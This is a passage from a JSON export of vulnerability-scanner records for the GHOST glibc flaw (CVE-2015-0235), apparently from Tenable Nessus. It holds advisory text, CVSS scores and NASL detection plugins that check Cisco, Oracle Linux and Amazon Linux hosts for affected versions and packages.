{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:05", "description": "The Cisco Application Control Engine (ACE) software installed on the remote Cisco IOS device is version A2(3.6d) or A5(3.1b). It is, therefore, affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-20T00:00:00", "type": "nessus", "title": "Cisco Application Control Engine GNU glibc gethostbyname Function Buffer Overflow Vulnerability (cisco-sa-20150128-ghost) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:cisco:application_control_engine_software"], "id": "CISCO-SA-20150128-ACE.NASL", "href": "https://www.tenable.com/plugins/nessus/81423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81423);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68907\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus67782\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Application Control Engine GNU glibc gethostbyname Function Buffer Overflow Vulnerability (cisco-sa-20150128-ghost) (GHOST)\");\n script_summary(english:\"Checks the ACE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cisco Application Control Engine (ACE) software installed on the\nremote Cisco IOS device is version A2(3.6d) or A5(3.1b). It is,\ntherefore, affected by a heap-based buffer overflow vulnerability in\nthe GNU C Library (glibc) due to improperly validating user-supplied\ninput to the __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2() functions. This allows a remote attacker to cause a\nbuffer overflow, resulting in a denial of service condition or the\nexecution of arbitrary code.\");\n # https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20150128-ghost.html#@ID\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2a71f8e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus68907\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus67782\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"The vendor has stated that no release is planned to fix this issue.\nContact the vendor for other possible options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:application_control_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ace_version.nasl\");\n script_require_keys(\"Host/Cisco/ACE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nversion = get_kb_item(\"Host/Cisco/ACE/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, 'Cisco ACE');\n\nif (\n version == \"A2(3.6d)\" ||\n version == \"A5(3.1b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : See solution.' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Cisco ACE\", version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:46", "description": "The remote Cisco device is running a version of Cisco IOS XR software that is potentially affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that this issue only affects Cisco Network Convergence System 6000 Series routers.", "cvss3": {}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XR GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-04-08T00:00:00", "cpe": ["cpe:/o:cisco:ios_xr"], "id": "CISCO-SA-20150128-GHOST-IOSXR_NCS6K.NASL", "href": "https://www.tenable.com/plugins/nessus/81596", "sourceData": "#TRUSTED 2bab4c2e8dd04360f36373efc45585d7a04f28fe49a09709edf37a96992be6a1071b8be5caf474f7b3891f9fd6d7418be0ee05638307846d1ef936233876d0e5ed93e215a8147d9f425a515c7dd28f89062aa13a479e59c18d0864c745e07a249a7b620fef8936000a2e61f44e457b072c7d5645b3878d09103689fd374339b6c44ff5141b708d9b300fbbc24254ce0c13d57206283e2fbe481f11d3761e4fcd4b41914d83ecbcae5cc9bcbb104b76f7ef33e9376832018894203162eb2867a0dea2d3c1060d15a7f79b12a9f2f74c21e9fbec9c109f4129b9a23a31631d019dd76957e9e038b0a67cb06c56c9482f76cccfc4f872e6fc2c051812e2afce2ecf6aabb14714cef10a104181c3a419b19c41fd3d1a28a7dd39e87da5510f5d2d53b7eb7d2f0f7b646bd87728f1b6f89b694e3179aae4269b473fa62f9f612a807a880912b39b6e13cc9542ce719236787ddfdd10d1fe31eef832c6d2924916a4f465805619909dd6d5b0ac42c1ef4618e6f9460cf26673cb0220147490bedf825387fe826378f8f3ebabccd7f87d9b7fc15b932462020baaf1914bf03e38d0b6b9f24ae8cbcf450a4c4fe539e1b09603a9deb4b2df8db292c5da66c4d105048714ae272f6a2c2650e4b815be6f4fd43d0f9b451349a398aadd6baa8e303a642d75abf3cbfa8d84ab3b98aea90ef77e59922a6390886844add7f0e5ce1a9b54d9ec\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81596);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/08\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69517\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XR GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the IOS XR version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XR software\nthat is potentially affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidated user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\n\nNote that this issue only affects Cisco Network Convergence System\n6000 Series routers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69517\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69517.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xr_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice_name = \"Cisco Network Convergence System 6000 Series Router\";\n\n# Check model\nmodel = get_kb_item(\"CISCO/model\");\nif(\n !isnull(model)\n &&\n tolower(model) !~ \"ncs(6008|6k)\"\n) audit(AUDIT_HOST_NOT, device_name);\n\n# First source failed, try another source\nif (isnull(model))\n{\n model = get_kb_item_or_exit(\"Host/Cisco/IOS-XR/Model\");\n if (\n \"NCS6008\" >!< model\n &&\n \"NCS6k\" >!< model\n ) audit(AUDIT_HOST_NOT, device_name);\n}\n\n# Check rough version\n# 5.2.x / 5.4.x\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XR/Version\");\nif (version !~ \"^5\\.[24]\\.\")\n audit(AUDIT_HOST_NOT, device_name + \" 5.2.x / 5.4.x\");\n\nport = get_kb_item(\"Host/Cisco/IOS-XR/Port\");\nif(empty_or_null(port))\n port = 0;\n\n# Affected :\n# 5.2.4.BASE, i.e., 5.2.4\n# 5.4.0.BASE, i.e., 5.4.0\nif (\n version == \"5.2.4\"\n ||\n version == \"5.4.0\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69517' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port:port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, device_name, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:05", "description": "From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81031", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# Oracle Linux Security Advisory ELSA-2015-0092 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81031);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004810.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004812.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.0.4.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:02", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call to either of these functions can use this flaw to execute arbitrary code with the permissions of the user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories, 'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : glibc (ALAS-2015-473)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-headers", "p-cpe:/a:amazon:linux:glibc-static", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-473.NASL", "href": "https://www.tenable.com/plugins/nessus/81024", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-473.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81024);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"ALAS\", value:\"2015-473\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2015-473)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call to either of these functions\ncan use this flaw to execute arbitrary code with the permissions of\nthe user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with\nnew glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the\nCVE. Running 'yum clean all' followed by 'yum update glibc' will\ninstall the fixed package, and you should reboot your instance after\ninstalling the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same\n'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories,\n'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or\n2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc\npackage. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update glibc' to update your system. Note that you may need\nto run 'yum clean all' first. Once this update has been applied,\n'reboot your instance to ensure that all processes and daemons that\nlink against glibc are using the updated version'. On new instance\nlaunches, you should still reboot after cloud-init has automatically\napplied this update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 